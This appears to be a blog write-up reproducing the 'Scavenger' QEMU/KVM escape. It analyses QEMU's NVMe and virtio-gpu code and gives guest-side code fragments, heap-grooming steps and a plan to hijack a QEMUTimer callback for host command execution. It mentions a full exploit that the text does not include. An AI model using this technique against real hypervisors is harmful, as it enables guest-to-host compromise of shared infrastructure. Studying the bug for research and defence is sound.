Misuse Error Handling Leading To QEMU/KVM Escape

This post reproduces "Scavenger: Misuse Error Handling Leading To QEMU/KVM Escape". Although the bug never received a CVE, it was a real, exploitable vulnerability.

References: https://zhuanlan.zhihu.com/p/373084566 and https://github.com/hustdebug/scavenger

Vulnerability Analysis

The Vulnerable Function

When nvme_map_prp reaches pci_dma_sglist_init, qsg->sg = g_malloc(alloc_hint * sizeof(ScatterGatherEntry)) allocates a heap buffer for qsg->sg. Later, at if (unlikely(!prp2)), a prp2 of 0 jumps straight to the unmap label and calls qemu_sglist_destroy, whose g_free(qsg->sg) releases that heap memory. But if execution took the qemu_iovec_init branch instead, qsg->sg still holds an uninitialized value, and the same jump to unmap makes qemu_sglist_destroy free that uninitialized value. If that stale value happens to be the address of memory the guest can read and write directly, the bug can be exploited further.

static uint16_t nvme_map_prp(QEMUSGList *qsg, QEMUIOVector *iov, uint64_t prp1,
                             uint64_t prp2, uint32_t len, NvmeCtrl *n)
{
    hwaddr trans_len = n->page_size - (prp1 % n->page_size);
    trans_len = MIN(len, trans_len);
    int num_prps = (len >> n->page_bits) + 1;

    if (unlikely(!prp1)) {
        trace_nvme_err_invalid_prp();
        return NVME_INVALID_FIELD | NVME_DNR;
    } else if (n->cmbsz && prp1 >= n->ctrl_mem.addr &&
               prp1 < n->ctrl_mem.addr + int128_get64(n->ctrl_mem.size)) {
        qsg->nsg = 0;
        qemu_iovec_init(iov, num_prps);
        qemu_iovec_add(iov, (void *)&n->cmbuf[prp1 - n->ctrl_mem.addr], trans_len);
    } else {
        pci_dma_sglist_init(qsg, &n->parent_obj, num_prps);
        qemu_sglist_add(qsg, prp1, trans_len);
    }
    len -= trans_len;
    if (len) {
        if (unlikely(!prp2)) {
            trace_nvme_err_invalid_prp2_missing();
            goto unmap;
        }
        ………………
        ………………

    }
    return NVME_SUCCESS;

unmap:
    qemu_sglist_destroy(qsg);
    return NVME_INVALID_FIELD | NVME_DNR;
}

void qemu_sglist_destroy(QEMUSGList *qsg)
{
    object_unref(OBJECT(qsg->dev));
    g_free(qsg->sg);
    memset(qsg, 0, sizeof(*qsg));
}
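
From the guest, the buggy path is reached with a single NVMe read command: prp1 must point into the controller memory buffer (CMB) so the qemu_iovec_init branch runs, the transfer must be longer than the first page fragment so len stays non-zero, and prp2 must be 0. A minimal sketch of such a command; the CMB base 0xfe000000 and the 512-byte block size are assumptions matching the exploit environment at the end of this post:

    NvmeRwCmd cmd = {0};               /* same SQE layout as in the exploit below  */
    cmd.opcode = 0x02;                 /* NVME_CMD_READ                            */
    cmd.nsid   = 1;
    cmd.prp1   = 0xfe000000 + 0xc00;   /* inside the CMB -> qemu_iovec_init branch */
    cmd.prp2   = 0;                    /* unlikely(!prp2) -> goto unmap            */
    cmd.nlb    = 7;                    /* 8 blocks * 512B = 0x1000 bytes, so after */
                                       /* len -= trans_len (0x400), 0xc00 remains  */
    /* submitting this on an I/O queue makes qemu_sglist_destroy() free the
     * stale qsg->sg left in the heap-allocated NvmeRequest */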

The analysis below follows Gaoning's approach entirely; I recommend reading the links at the top directly. I am writing this post purely so I don't forget.

Identifying the Callers

nvme_map_prp has three callers: nvme_dma_write_prp, nvme_dma_read_prp, and nvme_rw.

In nvme_dma_write_prp and nvme_dma_read_prp, qsg is a stack variable, so there is no way to control the uninitialized value that ends up in qsg->sg.

static uint16_t nvme_dma_write_prp(NvmeCtrl *n, uint8_t *ptr, uint32_t len,
                                   uint64_t prp1, uint64_t prp2)
{
    ………………
    ………………
    if (nvme_map_prp(&qsg, &iov, prp1, prp2, len, n)) {
        return NVME_INVALID_FIELD | NVME_DNR;
    }
    ………………
    ………………
    return status;
}

In nvme_rw, by contrast, the qsg lives on the heap:

static void nvme_process_sq(void *opaque)
{
    ………………
    ………………
    while (!(nvme_sq_empty(sq) || QTAILQ_EMPTY(&sq->req_list))) {
        addr = sq->dma_addr + sq->head * n->sqe_size;
        nvme_addr_read(n, addr, (void *)&cmd, sizeof(cmd));
        nvme_inc_sq_head(sq);

        req = QTAILQ_FIRST(&sq->req_list);
        QTAILQ_REMOVE(&sq->req_list, req, entry);
        QTAILQ_INSERT_TAIL(&sq->out_req_list, req, entry);
        memset(&req->cqe, 0, sizeof(req->cqe));
        req->cqe.cid = cmd.cid;

        status = sq->sqid ? nvme_io_cmd(n, &cmd, req) :
            nvme_admin_cmd(n, &cmd, req);
    ………………
    ………………
}

static uint16_t nvme_io_cmd(NvmeCtrl *n, NvmeCmd *cmd, NvmeRequest *req)
{
    ………………
    ………………
    case NVME_CMD_READ:
        return nvme_rw(n, ns, cmd, req);
    default:
        trace_nvme_err_invalid_opc(cmd->opcode);
        return NVME_INVALID_OPCODE | NVME_DNR;
    }
}

static uint16_t nvme_rw(NvmeCtrl *n, NvmeNamespace *ns, NvmeCmd *cmd,
                        NvmeRequest *req)
{
    ………………
    ………………
    if (nvme_map_prp(&req->qsg, &req->iov, prp1, prp2, data_size, n)) {
        block_acct_invalid(blk_get_stats(n->conf.blk), acct);
        return NVME_INVALID_FIELD | NVME_DNR;
    }
    ………………
    ………………
}
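
The heap placement comes from the request objects themselves: nvme_init_sq allocates each submission queue's request array with sq->io_req = g_new(NvmeRequest, sq->size), and the QEMUSGList is embedded in the request. Roughly (a sketch based on hw/block/nvme.h of that era; the exact field order is from memory):

    typedef struct NvmeRequest {
        struct NvmeSQueue       *sq;
        BlockAIOCB              *aiocb;
        uint16_t                status;
        bool                    has_sg;
        NvmeCqe                 cqe;
        BlockAcctCookie         acct;
        QEMUSGList              qsg;   /* req->qsg.sg keeps whatever the
                                        * reclaimed chunk previously held */
        QEMUIOVector            iov;
        QTAILQ_ENTRY(NvmeRequest)entry;
    } NvmeRequest;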

Cross-Domain Attack

In virtio_gpu_create_mapping_iov, dma_memory_map translates guest physical addresses into QEMU's host virtual addresses for the real memory backing the guest. The address stored in (*iov)[i].iov_base therefore points into the guest's own RAM, which the guest can read and write directly.

After *iov is freed, the chunk is reallocated for the qsg. Using the residual iov_base addresses and the bug above, we can make QEMU g_free() that memory, memory the guest itself can read and write. From there it is easy to forge chunks and leak information: with nothing but ordinary memory reads and writes inside the guest, we reach across the boundary into QEMU's heap.
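
Putting the pieces together, the cross-domain free proceeds roughly like this (a sketch of the heap choreography, not literal code):

    /*
     * 1. virtio_gpu_create_mapping_iov():
     *        *iov = g_malloc0(sizeof(struct iovec) * nr_entries);   // chunk A
     *        (*iov)[i].iov_base = dma_memory_map(...);  // host ptr -> guest RAM
     *    An error path then frees chunk A, leaving those guest-RAM
     *    pointers behind as stale heap contents.
     *
     * 2. nvme_init_sq(): sq->io_req = g_new(NvmeRequest, sq->size)
     *    reclaims chunk A, so some req->qsg.sg now aliases a stale iov_base
     *    (and req->qsg.dev aliases a zero entry, to survive object_unref).
     *
     * 3. nvme_map_prp() CMB path with prp2 == 0:
     *        goto unmap -> qemu_sglist_destroy(qsg) -> g_free(qsg->sg)
     *    frees a "chunk" that actually lives inside guest-visible RAM.
     *
     * 4. The guest now edits glibc heap metadata with plain loads/stores.
     */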

Reaching the Relevant Functions

Knowing that virtio_gpu_create_mapping_iov is what sets up the mapping table, the next question is how to get it called.

I tried to trace the call chain upward myself and, as before, ended up at the bottom-half function virtio_gpu_ctrl_bh, which is scheduled from virtio_gpu_handle_ctrl_cb:

static void virtio_gpu_handle_ctrl_cb(VirtIODevice *vdev, VirtQueue *vq)
{
    VirtIOGPU *g = VIRTIO_GPU(vdev);
    qemu_bh_schedule(g->ctrl_bh);
}
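
For reference, the bottom half itself just forwards to virtio_gpu_handle_ctrl once the main loop runs it (this is how it looks in hw/display/virtio-gpu.c of the same era):

    static void virtio_gpu_ctrl_bh(void *opaque)
    {
        VirtIOGPU *g = opaque;
        virtio_gpu_handle_ctrl(&g->parent_obj.parent_obj, g->ctrl_vq);
    }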

But nowhere in virtio-gpu.c could I find a caller of virtio_gpu_handle_ctrl_cb, nor the device registration code. I was completely stuck, and only figured it out afterwards by studying the parameters set in Gaoning's exploit (hindsight is 20/20 🤡).

virtio_gpu_device_realize calls virtio_gpu_base_device_realize. At first I assumed this function had little to do with invoking virtio_gpu_handle_ctrl_cb, but virtio_gpu_base_device_realize in turn calls virtio_add_queue, which stores the address of virtio_gpu_handle_ctrl_cb into vdev->vq[i].handle_output. In other words, virtio_gpu_handle_ctrl_cb is later invoked through vdev->vq[i].handle_output.

static void virtio_gpu_device_realize(DeviceState *qdev, Error **errp)
{
    ………………
    ………………

    if (!virtio_gpu_base_device_realize(qdev,
                                        virtio_gpu_handle_ctrl_cb,
                                        virtio_gpu_handle_cursor_cb,
                                        errp)) {
        return;
    }

    g->ctrl_vq = virtio_get_queue(vdev, 0);
    g->cursor_vq = virtio_get_queue(vdev, 1);
    g->ctrl_bh = qemu_bh_new(virtio_gpu_ctrl_bh, g);
    g->cursor_bh = qemu_bh_new(virtio_gpu_cursor_bh, g);
    QTAILQ_INIT(&g->reslist);
    QTAILQ_INIT(&g->cmdq);
    QTAILQ_INIT(&g->fenceq);
}

bool
virtio_gpu_base_device_realize(DeviceState *qdev,
                               VirtIOHandleOutput ctrl_cb,
                               VirtIOHandleOutput cursor_cb,
                               Error **errp)
{
    ………………
    ………………
    if (virtio_gpu_virgl_enabled(g->conf)) {
        /* use larger control queue in 3d mode */
        virtio_add_queue(vdev, 256, ctrl_cb);
        virtio_add_queue(vdev, 16, cursor_cb);
    } else {
        virtio_add_queue(vdev, 64, ctrl_cb);
        virtio_add_queue(vdev, 16, cursor_cb);
    }
    ………………
    ………………

}

VirtQueue *virtio_add_queue(VirtIODevice *vdev, int queue_size,
                            VirtIOHandleOutput handle_output)
{
    int i;

    for (i = 0; i < VIRTIO_QUEUE_MAX; i++) {
        if (vdev->vq[i].vring.num == 0)
            break;
    }

    if (i == VIRTIO_QUEUE_MAX || queue_size > VIRTQUEUE_MAX_SIZE)
        abort();

    vdev->vq[i].vring.num = queue_size;
    vdev->vq[i].vring.num_default = queue_size;
    vdev->vq[i].vring.align = VIRTIO_PCI_VRING_ALIGN;
    vdev->vq[i].handle_output = handle_output;
    vdev->vq[i].handle_aio_output = NULL;
    vdev->vq[i].used_elems = g_malloc0(sizeof(VirtQueueElement) *
                                       queue_size);

    return &vdev->vq[i];
}

In hw/virtio/virtio-pci.c, virtio_pci_notify_write calls virtio_queue_notify, which then calls vq->handle_output(vdev, vq) and thereby enters virtio_gpu_handle_ctrl_cb:

static void virtio_pci_notify_write(void *opaque, hwaddr addr,
                                    uint64_t val, unsigned size)
{
    VirtIODevice *vdev = opaque;
    VirtIOPCIProxy *proxy = VIRTIO_PCI(DEVICE(vdev)->parent_bus->parent);
    unsigned queue = addr / virtio_pci_queue_mem_mult(proxy);

    if (queue < VIRTIO_QUEUE_MAX) {
        virtio_queue_notify(vdev, queue);
    }
}

void virtio_queue_notify(VirtIODevice *vdev, int n)
{
    VirtQueue *vq = &vdev->vq[n];

    if (unlikely(!vq->vring.desc || vdev->broken)) {
        return;
    }

    trace_virtio_queue_notify(vdev, vq - vdev->vq, vq);
    if (vq->host_notifier_enabled) {
        event_notifier_set(&vq->host_notifier);
    } else if (vq->handle_output) {
        vq->handle_output(vdev, vq);

        if (unlikely(vdev->start_on_kick)) {
            virtio_set_started(vdev, true);
        }
    }
}

The device registration and the MMIO read/write handlers are easy to locate in virtio-pci.c.
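
Seen from the guest, kicking the control queue is a single MMIO write into the virtio-pci notify region; with QEMU's default modern layout that region sits at offset 0x3000 of BAR4, which is what the exploit below relies on. A minimal sketch:

    /* mmio_gpu = BAR4 of the virtio-gpu device, mapped via sysfs resource4 */
    static void kick_ctrl_queue(void *mmio_gpu)
    {
        /* queue 0 -> virtio_pci_notify_write -> virtio_queue_notify(vdev, 0) */
        *(volatile uint32_t *)(mmio_gpu + 0x3000) = 0;
    }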

Execution then enters virtio_gpu_handle_ctrl, which calls virtqueue_pop to fetch a cmd; virtqueue_pop in turn calls virtqueue_split_pop:

static void virtio_gpu_handle_ctrl(VirtIODevice *vdev, VirtQueue *vq)
{
    ………………
    ………………
    cmd = virtqueue_pop(vq, sizeof(struct virtio_gpu_ctrl_command));
    while (cmd) {
        cmd->vq = vq;
        cmd->error = 0;
        cmd->finished = false;
        QTAILQ_INSERT_TAIL(&g->cmdq, cmd, next);
        cmd = virtqueue_pop(vq, sizeof(struct virtio_gpu_ctrl_command));
    }

    virtio_gpu_process_cmdq(g);
    ………………
    ………………
}

void *virtqueue_pop(VirtQueue *vq, size_t sz)
{
    if (unlikely(vq->vdev->broken)) {
        return NULL;
    }

    if (virtio_vdev_has_feature(vq->vdev, VIRTIO_F_RING_PACKED)) {
        return virtqueue_packed_pop(vq, sz);
    } else {
        return virtqueue_split_pop(vq, sz);
    }
}

virtqueue_split_pop is the key function for populating the data used in the mapping table: it reads the VRingDesc structures from the guest physical address in vq->vring.desc, runs them through some validation, and copies the results into elem. See the source and comments:

static void *virtqueue_split_pop(VirtQueue *vq, size_t sz)
{
    unsigned int i, head, max;
    VRingMemoryRegionCaches *caches;
    MemoryRegionCache indirect_desc_cache = MEMORY_REGION_CACHE_INVALID;
    MemoryRegionCache *desc_cache;
    int64_t len;
    VirtIODevice *vdev = vq->vdev;
    VirtQueueElement *elem = NULL;
    unsigned out_num, in_num, elem_entries;
    hwaddr addr[VIRTQUEUE_MAX_SIZE];
    struct iovec iov[VIRTQUEUE_MAX_SIZE];
    VRingDesc desc;
    int rc;

    RCU_READ_LOCK_GUARD();
    /*
     * virtio_queue_empty_rcu decides whether the queue is empty: it compares
     * vq->shadow_avail_idx with vq->last_avail_idx and returns 0 if they
     * differ; if they are equal it refreshes shadow_avail_idx via
     * vring_avail_idx and compares again, returning 1 only if still equal.
     * shadow_avail_idx is read from the guest physical address
     * (vq->vring.avail + offsetof(VRingAvail, idx)).
     */
    if (virtio_queue_empty_rcu(vq)) {
        goto done;
    }
    /* Needed after virtio_queue_empty(), see comment in
     * virtqueue_num_heads(). */
    smp_rmb();

    /* When we start there are none of either input nor output. */
    out_num = in_num = elem_entries = 0;

    max = vq->vring.num;

    if (vq->inuse >= vq->vring.num) {
        virtio_error(vdev, "Virtqueue size exceeded");
        goto done;
    }
    /*
     * virtqueue_get_head fetches the head index of the queue; head is read
     * from the guest physical address
     * (vq->vring.avail + offsetof(VRingAvail, ring[vq->last_avail_idx])).
     */
    if (!virtqueue_get_head(vq, vq->last_avail_idx++, &head)) {
        goto done;
    }

    if (virtio_vdev_has_feature(vdev, VIRTIO_RING_F_EVENT_IDX)) {
        vring_set_avail_event(vq, vq->last_avail_idx);
    }
    /* update i */
    i = head;
    /* fetch the caches */
    caches = vring_get_region_caches(vq);
    if (!caches) {
        virtio_error(vdev, "Region caches not initialized");
        goto done;
    }

    if (caches->desc.len < max * sizeof(VRingDesc)) {
        virtio_error(vdev, "Cannot map descriptor ring");
        goto done;
    }

    desc_cache = &caches->desc;
    /*
     * vring_split_desc_read copies the VRingDesc structure at the guest
     * physical address (vq->vring.desc + i * sizeof(VRingDesc)) into desc
     */
    vring_split_desc_read(vdev, &desc, desc_cache, i);
    if (desc.flags & VRING_DESC_F_INDIRECT) {
        if (!desc.len || (desc.len % sizeof(VRingDesc))) {
            virtio_error(vdev, "Invalid size for indirect buffer table");
            goto done;
        }

        /* loop over the indirect descriptor table */
        len = address_space_cache_init(&indirect_desc_cache, vdev->dma_as,
                                       desc.addr, desc.len, false);
        desc_cache = &indirect_desc_cache;
        if (len < desc.len) {
            virtio_error(vdev, "Cannot map indirect buffer");
            goto done;
        }

        max = desc.len / sizeof(VRingDesc);
        i = 0;
        vring_split_desc_read(vdev, &desc, desc_cache, i);
    }

    /* Collect all the descriptors */
    do {
        bool map_ok;

        if (desc.flags & VRING_DESC_F_WRITE) {
            map_ok = virtqueue_map_desc(vdev, &in_num, addr + out_num,
                                        iov + out_num,
                                        VIRTQUEUE_MAX_SIZE - out_num, true,
                                        desc.addr, desc.len);
        } else {
            if (in_num) {
                virtio_error(vdev, "Incorrect order for descriptors");
                goto err_undo_map;
            }
            /*
             * virtqueue_map_desc effectively does:
             *   iov[out_num].iov_base = result of dma_memory_map(desc.addr)
             *   iov[out_num].iov_len  = desc.len
             *   out_num++
             */
            map_ok = virtqueue_map_desc(vdev, &out_num, addr, iov,
                                        VIRTQUEUE_MAX_SIZE, false,
                                        desc.addr, desc.len);
        }
        if (!map_ok) {
            goto err_undo_map;
        }

        /* If we've got too many, that implies a descriptor loop. */
        if (++elem_entries > max) {
            virtio_error(vdev, "Looped descriptor");
            goto err_undo_map;
        }
        /*
         * virtqueue_split_read_next_desc checks desc.flags, sets
         * i = desc->next, and uses vring_split_desc_read to fetch the
         * next VRingDesc structure
         */
        rc = virtqueue_split_read_next_desc(vdev, &desc, desc_cache, max, &i);
    } while (rc == VIRTQUEUE_READ_DESC_MORE);

    if (rc == VIRTQUEUE_READ_DESC_ERROR) {
        goto err_undo_map;
    }

    /* Now copy what we have collected and mapped */
    elem = virtqueue_alloc_element(sz, out_num, in_num);
    elem->index = head;
    elem->ndescs = 1;
    for (i = 0; i < out_num; i++) {
        elem->out_addr[i] = addr[i];
        elem->out_sg[i] = iov[i];
    }
    for (i = 0; i < in_num; i++) {
        elem->in_addr[i] = addr[out_num + i];
        elem->in_sg[i] = iov[out_num + i];
    }

    vq->inuse++;

    trace_virtqueue_pop(vq, elem, elem->in_num, elem->out_num);
done:
    address_space_cache_destroy(&indirect_desc_cache);

    return elem;

err_undo_map:
    virtqueue_undo_map_desc(out_num, in_num, iov);
    goto done;
}
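
On the guest side, feeding this function means laying out a split-ring descriptor chain in guest memory. A minimal sketch (desc, avail, and gva_to_gpa are as declared in the exploit at the end of this post; hdr_buf, payload, and payload_len are hypothetical):

    /* a two-descriptor chain: header first, then the payload */
    desc[0].addr  = gva_to_gpa(hdr_buf);
    desc[0].len   = sizeof(struct virtio_gpu_ctrl_hdr);
    desc[0].flags = VRING_DESC_F_NEXT;          /* chain continues         */
    desc[0].next  = 1;

    desc[1].addr  = gva_to_gpa(payload);
    desc[1].len   = payload_len;
    desc[1].flags = 0;                          /* end of chain            */

    avail->ring[0] = 0;                         /* head index of the chain */
    avail->idx     = 1;                         /* publish it to QEMU      */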

With a cmd in hand, execution enters virtio_gpu_simple_process_cmd. It first invokes VIRTIO_GPU_FILL_CMD, a macro that simply copies the data at the addr of the first descriptor collected by virtqueue_split_pop above into cmd->cmd_hdr; the switch then dispatches to the matching handler:

#define VIRTIO_GPU_FILL_CMD(out) do {                                   \
        size_t s;                                                       \
        s = iov_to_buf(cmd->elem.out_sg, cmd->elem.out_num, 0,          \
                       &out, sizeof(out));                              \
        if (s != sizeof(out)) {                                         \
            qemu_log_mask(LOG_GUEST_ERROR,                              \
                          "%s: command size incorrect %zu vs %zu\n",    \
                          __func__, s, sizeof(out));                    \
            return;                                                     \
        }                                                               \
    } while (0)

static void virtio_gpu_simple_process_cmd(VirtIOGPU *g,
                                          struct virtio_gpu_ctrl_command *cmd)
{
    VIRTIO_GPU_FILL_CMD(cmd->cmd_hdr);
    virtio_gpu_ctrl_hdr_bswap(&cmd->cmd_hdr);

    switch (cmd->cmd_hdr.type) {

    ………………
    ………………

    case VIRTIO_GPU_CMD_RESOURCE_ATTACH_BACKING:
        virtio_gpu_resource_attach_backing(g, cmd);
        break;
    case VIRTIO_GPU_CMD_RESOURCE_DETACH_BACKING:
        virtio_gpu_resource_detach_backing(g, cmd);
        break;
    default:
        cmd->error = VIRTIO_GPU_RESP_ERR_UNSPEC;
        break;
    }
    if (!cmd->finished) {
        virtio_gpu_ctrl_response_nodata(g, cmd, cmd->error ? cmd->error :
                                        VIRTIO_GPU_RESP_OK_NODATA);
    }
}

For virtio_gpu_resource_attach_backing to actually reach virtio_gpu_create_mapping_iov, the virtio_gpu_simple_resource returned by virtio_gpu_find_resource(g, ab.resource_id) must satisfy a few conditions. So we first call virtio_gpu_resource_create_2d to create a virtio_gpu_simple_resource, let ab.resource_id locate that resource, and virtio_gpu_create_mapping_iov then becomes reachable.

static void
virtio_gpu_resource_attach_backing(VirtIOGPU *g,
                                   struct virtio_gpu_ctrl_command *cmd)
{
    struct virtio_gpu_simple_resource *res;
    struct virtio_gpu_resource_attach_backing ab;
    int ret;

    VIRTIO_GPU_FILL_CMD(ab);
    virtio_gpu_bswap_32(&ab, sizeof(ab));
    trace_virtio_gpu_cmd_res_back_attach(ab.resource_id);

    res = virtio_gpu_find_resource(g, ab.resource_id);
    if (!res) {
        qemu_log_mask(LOG_GUEST_ERROR, "%s: illegal resource specified %d\n",
                      __func__, ab.resource_id);
        cmd->error = VIRTIO_GPU_RESP_ERR_INVALID_RESOURCE_ID;
        return;
    }

    if (res->iov) {
        cmd->error = VIRTIO_GPU_RESP_ERR_UNSPEC;
        return;
    }

    ret = virtio_gpu_create_mapping_iov(g, &ab, cmd, &res->addrs, &res->iov);
    if (ret != 0) {
        cmd->error = VIRTIO_GPU_RESP_ERR_UNSPEC;
        return;
    }

    res->iov_cnt = ab.nr_entries;
}

static void virtio_gpu_resource_create_2d(VirtIOGPU *g,
                                          struct virtio_gpu_ctrl_command *cmd)
{
    ………………
    ………………

    if (c2d.resource_id == 0) {
        qemu_log_mask(LOG_GUEST_ERROR, "%s: resource id 0 is not allowed\n",
                      __func__);
        cmd->error = VIRTIO_GPU_RESP_ERR_INVALID_RESOURCE_ID;
        return;
    }

    res = virtio_gpu_find_resource(g, c2d.resource_id);
    if (res) {
        qemu_log_mask(LOG_GUEST_ERROR, "%s: resource already exists %d\n",
                      __func__, c2d.resource_id);
        cmd->error = VIRTIO_GPU_RESP_ERR_INVALID_RESOURCE_ID;
        return;
    }

    res = g_new0(struct virtio_gpu_simple_resource, 1);

    res->width = c2d.width;
    res->height = c2d.height;
    res->format = c2d.format;
    res->resource_id = c2d.resource_id;

    ………………
    ………………

    QTAILQ_INSERT_HEAD(&g->reslist, res, next);
    g->hostmem += res->hostmem;
}

Once inside virtio_gpu_create_mapping_iov, the mapping table setup can be completed:

int virtio_gpu_create_mapping_iov(VirtIOGPU *g,
                                  struct virtio_gpu_resource_attach_backing *ab,
                                  struct virtio_gpu_ctrl_command *cmd,
                                  uint64_t **addr, struct iovec **iov)
{
    struct virtio_gpu_mem_entry *ents;
    size_t esize, s;
    int i;

    if (ab->nr_entries > 16384) {
        qemu_log_mask(LOG_GUEST_ERROR,
                      "%s: nr_entries is too big (%d > 16384)\n",
                      __func__, ab->nr_entries);
        return -1;
    }

    esize = sizeof(*ents) * ab->nr_entries;
    ents = g_malloc(esize);
    s = iov_to_buf(cmd->elem.out_sg, cmd->elem.out_num,
                   sizeof(*ab), ents, esize);
    if (s != esize) {
        qemu_log_mask(LOG_GUEST_ERROR,
                      "%s: command data size incorrect %zu vs %zu\n",
                      __func__, s, esize);
        g_free(ents);
        return -1;
    }

    *iov = g_malloc0(sizeof(struct iovec) * ab->nr_entries);
    if (addr) {
        *addr = g_malloc0(sizeof(uint64_t) * ab->nr_entries);
    }
    for (i = 0; i < ab->nr_entries; i++) {
        uint64_t a = le64_to_cpu(ents[i].addr);
        uint32_t l = le32_to_cpu(ents[i].length);
        hwaddr len = l;
        (*iov)[i].iov_len = l;
        (*iov)[i].iov_base = dma_memory_map(VIRTIO_DEVICE(g)->dma_as,
                                            a, &len, DMA_DIRECTION_TO_DEVICE);
        if (addr) {
            (*addr)[i] = a;
        }
        if (!(*iov)[i].iov_base || len != l) {
            qemu_log_mask(LOG_GUEST_ERROR, "%s: failed to map MMIO memory for"
                          " resource %d element %d\n",
                          __func__, ab->resource_id, i);
            virtio_gpu_cleanup_mapping_iov(g, *iov, i);
            g_free(ents);
            *iov = NULL;
            if (addr) {
                g_free(*addr);
                *addr = NULL;
            }
            return -1;
        }
    }
    g_free(ents);
    return 0;
}
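
Note the error path at the bottom of the loop: if any entry fails to map, virtio_gpu_cleanup_mapping_iov unmaps the earlier entries and the *iov array itself is freed. This is the controlled free the exploit needs: an entry of length 0 makes dma_memory_map (ultimately address_space_map, which returns NULL for a zero-length request) fail the !(*iov)[i].iov_base check, so the array, already seeded with guest-RAM pointers, is freed on the spot. Sketch of the guest-supplied entries (payload_page stands for the guest page used later as payload_buf):

    ents[0].addr   = gva_to_gpa(payload_page);  /* mapped: iov_base -> guest RAM */
    ents[0].length = 0x100;
    ents[1].addr   = 0;
    ents[1].length = 0;                         /* dma_memory_map(len=0) == NULL */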

Exploitation Steps

  1. Use the malloc primitives in nvme_create_cq or nvme_create_sq to heap-spray and obtain a stable heap layout.
  2. Build the mapping table so that qsg->sg ends up holding a dma_memory_map'd address. When that address is freed later, qemu_sglist_destroy first runs object_unref(OBJECT(qsg->dev)), and to get past the check inside that function, qsg->dev must be set to 0 as well.
  3. After building it, the table must also be freed: simply pass len 0 to dma_memory_map so it returns 0 (NULL); the if (!(*iov)[i].iov_base || len != l) check then fires and virtio_gpu_cleanup_mapping_iov frees it directly.
  4. Create an SQ: nvme_init_sq runs sq->io_req = g_new(NvmeRequest, sq->size), a heap allocation of 0xa0 * sq->size bytes, which reclaims the mapping table freed in the previous step.
  5. Forge a chunk of size 0x290 and free the guest's memory directly through the vulnerable function; a heap address can then be leaked from the fd field of the forged chunk (see the layout sketch after this list).
  6. Next, leak the host address of the memory QEMU allocated to the guest: elem = virtqueue_alloc_element(sz, out_num, in_num) in virtqueue_split_pop can be made to return the forged chunk, and the dma_memory_map calls in virtqueue_split_pop then write the wanted addresses into it.
  7. Build another mapping table just as before, this time forging a chunk of size 0x40, and free the guest memory with the vulnerable function. Again create an SQ: nvme_init_sq runs sq->timer = timer_new_ns(QEMU_CLOCK_VIRTUAL, nvme_process_sq, sq) to create the timer, and since the timer uses a 0x40-sized chunk, it lands in the forged chunk.
  8. The forged chunk now holds a QEMUTimer structure: leak the address of nvme_process_sq to recover QEMU's base address, then overwrite cb and opaque to achieve arbitrary command execution.
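
For step 5, the forged 0x290 chunk lives entirely inside a guest-owned page; the freed pointer is &payload_buf[2], so only two size fields need forging to satisfy glibc (offsets match the payload_buf writes in the exploit below):

    payload_buf[1]    = 0x291;   /* size field of the fake chunk (PREV_INUSE set) */
    payload_buf[0x53] = 0x21;    /* size of the "next chunk" at byte offset 0x298,
                                  * so free() sees a sane successor               */
    /* after the cross-domain free, payload_buf[2] (the fd/next slot of the
     * freed chunk) holds a host heap pointer readable by the guest */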

One issue I overlooked when I first started reproducing this: inside nvme_map_prp, qemu_iovec_init allocates a heap chunk via g_new(struct iovec, alloc_hint), whose size depends on alloc_hint. If that chunk also happens to be 0x40 bytes, then by the time the forged 0x40 chunk is freed at the end, qemu_iovec_init has already taken one 0x40 chunk, the 0x40 tcache count drops by one, and the forged chunk ends up in the 0x40 tcache.

static uint16_t nvme_map_prp(QEMUSGList *qsg, QEMUIOVector *iov, uint64_t prp1,
                             uint64_t prp2, uint32_t len, NvmeCtrl *n)
{
    hwaddr trans_len = n->page_size - (prp1 % n->page_size);
    trans_len = MIN(len, trans_len);
    int num_prps = (len >> n->page_bits) + 1;

    if (unlikely(!prp1)) {
        trace_nvme_err_invalid_prp();
        return NVME_INVALID_FIELD | NVME_DNR;
    } else if (n->cmbsz && prp1 >= n->ctrl_mem.addr &&
               prp1 < n->ctrl_mem.addr + int128_get64(n->ctrl_mem.size)) {
        qsg->nsg = 0;
        qemu_iovec_init(iov, num_prps);
        qemu_iovec_add(iov, (void *)&n->cmbuf[prp1 - n->ctrl_mem.addr], trans_len);
    }
    ………………
    ………………
}

void qemu_iovec_init(QEMUIOVector *qiov, int alloc_hint)
{
    qiov->iov = g_new(struct iovec, alloc_hint);
    qiov->niov = 0;
    qiov->nalloc = alloc_hint;
    qiov->size = 0;
}
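
The size arithmetic behind this pitfall: alloc_hint is num_prps = (len >> page_bits) + 1, and struct iovec is 16 bytes on x86-64, so g_new requests 16 * num_prps bytes. With standard glibc chunk rounding:

    /* num_prps = (len >> 12) + 1, request = 16 * num_prps bytes:
     *   len <  0x1000          -> num_prps = 1 -> 16 bytes -> 0x20 chunk
     *   0x1000 <= len < 0x2000 -> num_prps = 2 -> 32 bytes -> 0x30 chunk
     *   0x2000 <= len < 0x3000 -> num_prps = 3 -> 48 bytes -> 0x40 chunk
     *                             (collides with the forged 0x40 chunk)
     * so pick len to keep the iovec allocation out of the 0x40 bin
     */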

The QEMUTimer structure, however, is allocated with calloc, which never takes chunks from the tcache. So as long as the len passed to nvme_map_prp is chosen well, the subsequent g_new(struct iovec, alloc_hint) in qemu_iovec_init avoids the situation above.

Why mention this? Because I initially got the len parameter of nvme_map_prp wrong, ran into exactly this situation, and at the time had no idea where the problem was.

Back then I even worked out a way to complete the exploit under that scenario: forge the chunk with size 0x50 so that after the free it enters the 0x50 fastbin; use sq->io_req = g_new(NvmeRequest, sq->size) in nvme_init_sq to make a large allocation, which moves the forged chunk into the 0x50 small bin (the earlier heap spray has already emptied the 0x40 small bin); the calloc for the QEMUTimer structure is then served from the 0x50 small bin.

Once timer_new_ns has been called, exploitation proceeds as usual.
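
For step 8, the QEMUTimer that ends up inside the forged chunk looks roughly like this (a sketch based on include/qemu/timer.h of that era; exact fields may differ):

    struct QEMUTimer {
        int64_t expire_time;      /* in nanoseconds                               */
        QEMUTimerList *timer_list;
        QEMUTimerCB *cb;          /* initially nvme_process_sq: leaks QEMU's base */
        void *opaque;             /* overwrite cb/opaque -> arbitrary command     */
        QEMUTimer *next;
        int attributes;
        int scale;
    };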

The reason the forged chunk is not sent straight into the unsorted bin is that free() validates the chunk's address:

    if (__builtin_expect (contiguous (av)
                          && (char *) nextchunk
                          >= ((char *) av->top + chunksize(av->top)), 0))
        malloc_printerr ("double free or corruption (out)");

